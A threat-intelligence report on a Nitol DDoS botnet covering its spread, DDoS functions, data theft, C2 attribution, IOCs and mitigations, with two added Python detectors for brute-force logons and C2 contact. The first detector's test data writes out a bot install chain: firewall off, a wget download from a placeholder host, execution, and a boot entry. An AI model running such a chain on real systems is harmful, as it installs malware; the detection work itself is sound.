Nitol Botnet Analysis Report
1 Background

Recently, Huawei threat intelligence analysts observed a large volume of abnormal SSH brute-force attacks and traced them to a botnet controlling more than 9,000 bots. By tracking the attack tool set and the attack process, they identified it as a Nitol botnet. Binary reverse engineering and traceability forensics located the botnet's control host; the cloud service provider was contacted and the control host was shut down.

Nitol is one of the most active DDoS botnet families. Its open-source code has been upgraded, modified and reused by foreign hackers, and Nitol now has more than 10 variants speaking different protocols. Although the Nitol family's botnet tools have spread to other countries, it mainly infects domestic (Chinese) devices. In particular, since the exposure of the NSA's EternalBlue vulnerability and the Struts2 series of vulnerabilities, malicious code of various families (Nitol included) has been implanted in bulk through automated exploit tools.

This paper mainly introduces the spread and diffusion mode and the functionality of the Nitol botnet, and gives a preliminary introduction to the botnet's infrastructure and tools.

2 Attack Mode Analysis

The Nitol botnet discovered this time not only uses traditional brute force but also a large number of exploit tools, such as the ShadowBrokers leak tools, JBoss exploits and attacks on MySQL (port 3306). Once a host is compromised, the DDoS tool is delivered to it, and the bot or bot group is directed to perform malicious actions. The overall attack process is as follows:

During the analysis, the C2 address 112.73.93.251 was found to be an HFS server (HTTP File Server) hosting a large number of malicious files, as shown below:

In this paper, the key malicious samples hosted on the HFS are used as clues to analyze the construction method, functionality and infrastructure of the botnet.
2.1 Spread and Delivery

2.1.1 Brute force

While analyzing the file whgj11.exe, a large number of brute-force actions were found in the sample. The following figure shows the user names and passwords found during reverse analysis:

Once a brute-force attempt succeeds, the attacker sends the following commands to the compromised host: shut down the system firewall, download the DDoS tool with the wget command, execute the downloaded file, and add a Linux boot entry so the tool persists across reboots.

2.1.2 Vulnerability Exploitation

In the analysis of whgj11.exe we found not only brute force but also attacks against the target's TCP ports 139 and 445 that exploit the EternalBlue vulnerability and implant the DoublePulsar backdoor. Once the attack succeeds, the DDoS tool is downloaded. The following figure shows the exploit propagation traffic sent while whgj11.exe runs:

The traffic was analyzed with PassiveTotal and confirmed as EternalBlue + DoublePulsar exploitation. Other exploit tools are also hosted on the C2 server, as shown in the following table:
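The two observable stages of section 2.1.1, a password-guessing logon followed by the "firewall off, wget, execute, boot entry" command chain, can be detected from host logs. The following is an added example (not code from the Huawei report, and not one of the attacker's tools); it runs over constructed OpenSSH auth.log lines and a constructed command trace. The addresses 203.0.113.9 and 198.51.100.4, the user names and the download URL are placeholders, not indicators from the report.

```python
"""Detect an SSH brute-force logon and the Nitol-style post-logon command chain.

Added example, not part of the original report. Inputs are constructed:
auth.log lines in OpenSSH format and a one-command-per-line trace such as
auditd execve records or a shell history. All hosts and URLs are placeholders.
"""
import re
from collections import defaultdict

# Constructed auth.log sample: five failures from one source, then a success.
SAMPLE_AUTH_LOG = """\
Aug 22 10:01:03 web1 sshd[2201]: Failed password for root from 203.0.113.9 port 51022 ssh2
Aug 22 10:01:04 web1 sshd[2201]: Failed password for root from 203.0.113.9 port 51022 ssh2
Aug 22 10:01:05 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.9 port 51030 ssh2
Aug 22 10:01:06 web1 sshd[2205]: Failed password for root from 203.0.113.9 port 51041 ssh2
Aug 22 10:01:07 web1 sshd[2207]: Failed password for root from 203.0.113.9 port 51050 ssh2
Aug 22 10:01:09 web1 sshd[2209]: Accepted password for root from 203.0.113.9 port 51062 ssh2
Aug 22 10:03:10 web1 sshd[2300]: Failed password for alice from 198.51.100.4 port 40010 ssh2
Aug 22 10:03:15 web1 sshd[2301]: Accepted publickey for alice from 198.51.100.4 port 40011 ssh2
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\d+\.\d+\.\d+\.\d+)")


def find_bruteforce_logons(log_text, threshold=5):
    """Return [(ip, user, failures)] for sources that logged in after at least
    `threshold` failed password attempts. A success after many failures is the
    signature of a guessed credential rather than a mistyped one."""
    failures = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.group(1), m.group(2)
            if failures[ip] >= threshold:
                hits.append((ip, user, failures[ip]))
    return hits


# The report describes the post-logon chain as: disable the firewall, fetch the
# DDoS tool with wget, execute it, and register it as a boot entry. One pattern
# per stage; the command forms are common Linux ones, assumed for illustration.
CHAIN_STAGES = {
    "firewall_off": re.compile(
        r"\b(?:service\s+iptables\s+stop|systemctl\s+(?:stop|disable)\s+(?:firewalld|iptables)"
        r"|ufw\s+disable|iptables\s+-F)\b"),
    "download": re.compile(r"\b(?:wget|curl)\b\s+\S*https?://"),
    "execute": re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b|(?:^|;|&&)\s*(?:\./|/tmp/)\S+"),
    "persistence": re.compile(r"/etc/rc\.local|/etc/rc\.d/|/etc/init\.d/|crontab\s+-|/etc/cron"),
}

# Constructed command trace; the download host is a placeholder, not the report's C2.
SAMPLE_COMMANDS = """\
service iptables stop
wget http://203.0.113.9/linuxwhgj -O /tmp/linuxwhgj
chmod +x /tmp/linuxwhgj
/tmp/linuxwhgj
echo /tmp/linuxwhgj >> /etc/rc.local
"""


def classify_command_chain(commands):
    """Map each chain stage to the first command matching it.
    Returns (stages_seen, complete) where complete is True when all four stages occur."""
    seen = {}
    for cmd in commands.splitlines():
        for stage, rx in CHAIN_STAGES.items():
            if stage not in seen and rx.search(cmd):
                seen[stage] = cmd
    return seen, all(stage in seen for stage in CHAIN_STAGES)


if __name__ == "__main__":
    for ip, user, n in find_bruteforce_logons(SAMPLE_AUTH_LOG):
        print(f"brute-force logon: {user}@{ip} after {n} failures")
    stages, complete = classify_command_chain(SAMPLE_COMMANDS)
    print("full bot install chain" if complete else "partial chain", stages)
```

In production the failure counter should be windowed by time and the chain matcher fed from auditd or an EDR's process tree; a single stage (a wget alone) is normal activity, which is why the function reports the full chain separately from the stages seen.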
Once the exploit succeeds, the program propagates and calls the DLL file to download the DDoS tool.

2.2 DDoS Attack

During the analysis of Linuxwhgj, up to 14 DDoS attack methods were discovered, with the attack type selected according to the parameter passed to the program. The attack parameter correspondence table is as follows:
2.3 Data Theft

While analyzing the malicious sample whgj.exe, not only remote control actions but also a large number of MySQL database operations were found, as shown in the following figure:

As can be seen in the figure, there are sales and accounting related keywords, such as BILLID, SALEBILL, SALEDETAIL and PAYDETAIL, which suggests the sample is used to steal corporate financial information.

3 Traceability Analysis

3.1 Sample Behavior Association

During the analysis of whgj11.exe, it was found that, once unpacked, it is similar to the sample used by the Nitol group's botnet. The following figure compares the code logic of the sample found this time with a known Nitol botnet sample:

From the comparison it can be inferred that the botnet discovered this time is a branch of the Nitol botnet, which is why this paper is so named.

3.2 C2 Server

In the sample analysis the C2 address was confirmed as 112.73.93.251, which had not been listed on any threat intelligence platform as of 15:00 on August 22, 2018. A Whois query shows that this IP belongs to Eflycloud. Eflycloud's current top-up methods include Alipay, WeChat, online banking and offline payment, each of which leaves a trail that can be used to identify the attacker. In addition, Eflycloud requires a mobile phone number and an e-mail address at registration, which provides another way to identify the attacker. Eflycloud's customer service has already been contacted; the C2 server has been shut down and is currently inaccessible.

3.3 Tool Set

The attacker used a large number of exploit tools and remote control tools, as shown in the following table.
4 Analysis Conclusion

The analysis of this botnet is summarized as follows:

1. Common botnet controllers deploy the C2 service and the file download service on different nodes, but here both are hosted on the same node (112.73.93.251);
2. The tools used by the controller have already been exposed on the network and can be downloaded and used directly. After downloading and analyzing them, we found them to be common remote control tools;
3. Common botnet controllers hide the C2 and its registration information by methods such as purchasing domain name service or using a DGA, but the C2 service found here is hosted by a domestic cloud service provider.

Based on the above, we infer the following:

1. The botnet was launched by an individual or a small group without much experience; the use of common remote control tools is one indication;
2. The true identity of the controller can be obtained through the registration information held by the domestic cloud service provider. The controller quickly built a botnet for testing on a domestic cloud provider without giving much consideration to the privacy of the botnet itself.

5 Protective Measures

1. Block the C2 according to the IOC information in the appendix, and block the malicious samples from entering the enterprise;
2. Install the vendor-supplied patches or upgrade the affected software to the latest non-vulnerable version;
3. If you find a suspected malicious sample, you can submit it to Huawei Cloud Sandbox for detection and make a quick decision based on the result;
4. Deploy IPS-enabled devices to protect against the various exploits.

Appendix: IOC

C2: 112.73.93.251

HASH:
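Measure 1 above amounts to two checks: which internal hosts have already talked to the C2 (and how much they pulled from its HFS), and an egress block for the indicator. The following is an added example, not code from the Huawei report; it runs over constructed Zeek-style conn.log lines, the internal addresses 10.0.x.y and the non-C2 destination 198.51.100.20 are placeholders, and the only real indicator is the C2 address 112.73.93.251 from the appendix (the appendix hash list is empty, so only the address is matched).

```python
"""Match connection logs against the report's C2 indicator and render block rules.

Added example, not part of the original report. The conn.log lines below are
constructed; internal hosts are placeholders. The indicator set holds the one
address the appendix lists.
"""
import ipaddress

C2_IOCS = {"112.73.93.251"}

# Constructed Zeek-style conn.log (tab separated), columns:
# ts  uid  id.orig_h  id.orig_p  id.resp_h  id.resp_p  proto  service  orig_bytes  resp_bytes
SAMPLE_CONN_LOG = """\
1534908000.10\tC1a\t10.0.1.15\t49811\t112.73.93.251\t80\ttcp\thttp\t312\t524288
1534908001.30\tC1b\t10.0.1.15\t49812\t198.51.100.20\t443\ttcp\tssl\t1200\t9800
1534908002.50\tC1c\t10.0.2.40\t55001\t112.73.93.251\t80\ttcp\thttp\t280\t131072
1534908003.70\tC1d\t10.0.3.9\t40022\t112.73.93.251\t22\ttcp\t-\t64\t-
"""


def parse_conn_log(text):
    """Parse the tab-separated flows into dicts; '-' byte counts are treated as 0."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split("\t")
        rows.append({
            "ts": float(f[0]), "src": f[2], "dst": f[4], "dport": int(f[5]),
            "proto": f[6], "service": f[7],
            "orig_bytes": int(f[8]) if f[8] != "-" else 0,
            "resp_bytes": int(f[9]) if f[9] != "-" else 0,
        })
    return rows


def hosts_contacting_c2(rows, iocs=C2_IOCS):
    """Aggregate per internal source host: flows to any IOC, bytes received, ports used.
    A large resp_bytes over HTTP is consistent with pulling a tool from the HFS and
    marks that host as one to isolate and image, not merely to block."""
    summary = {}
    for r in rows:
        if r["dst"] in iocs:
            s = summary.setdefault(r["src"], {"flows": 0, "resp_bytes": 0, "ports": set()})
            s["flows"] += 1
            s["resp_bytes"] += r["resp_bytes"]
            s["ports"].add(r["dport"])
    return summary


def block_rules(iocs=C2_IOCS):
    """Render iptables rules for each indicator, validating it as an IPv4 address
    first so a malformed IOC cannot become a malformed (or over-broad) rule."""
    rules = []
    for ip in sorted(iocs):
        ipaddress.IPv4Address(ip)  # raises ValueError on a bad indicator
        rules.append(f"iptables -I OUTPUT -d {ip} -j DROP")
        rules.append(f"iptables -I INPUT -s {ip} -j DROP")
    return rules


if __name__ == "__main__":
    for src, s in hosts_contacting_c2(parse_conn_log(SAMPLE_CONN_LOG)).items():
        print(f"{src}: {s['flows']} flows, {s['resp_bytes']} bytes received, ports {sorted(s['ports'])}")
    print("\n".join(block_rules()))
```

Run the contact check over historical flow data before applying the rules: once the block is in place the C2 traffic disappears from the logs, and with it the list of hosts that still carry the DDoS tool.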
- 187****0268 2019-03-09 14:48:54 How can it be prevented?
- 134****5126 2018-11-06 20:44:24 What major harm does it cause?
- 134****5126 2018-11-06 20:41:23 What harm could it cause?
- Randall 2018-10-31 09:46:54 How to protect against it?